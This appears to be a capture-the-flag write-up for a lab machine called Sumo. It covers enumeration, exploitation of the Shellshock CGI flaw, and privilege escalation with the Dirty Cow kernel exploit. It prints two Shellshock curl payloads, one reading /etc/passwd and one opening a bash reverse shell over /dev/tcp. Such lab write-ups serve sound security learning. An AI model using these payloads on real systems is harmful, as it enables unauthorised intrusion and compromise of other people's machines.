Sumo : 1,480/


  • Enumeration indicates the possibility of a shellshock exploit
  • Scan and test for shellshock vulnerability
  • Use shellshock to get a reverse shell
  • Linux enumeration indicates the kernel is outdated
  • Use known outdated Linux exploit like Dirty Cow to gain privilege access


Run nmap scan to find for open ports.

Port 80

Run a gobuster scan to find for hidden directories.

/cgi-bin/ has 403 status. Run another scan on it.

/cgi-bin/ has be known to have shellshock vulnerability , use a nmap script to check if this vulnerability is available on the test script.

Vulnerability found.

Let’s test using the shellshock script.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"

Inject a reverse shell via the shell shock script.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'"


User access gained.

Upload linpeas to find for some clues.

The linux kernel is outdated

Check online for the kernel exploit and we can use the dirty cow exploit.

Upload the exploit to the victim machine.

Got an error compiling the code.

Google indicates to change the path directory.

PATH=PATH$:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/;export PATH

Privilege escalation

New account created

Switch to the new user.

Root flag is found.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s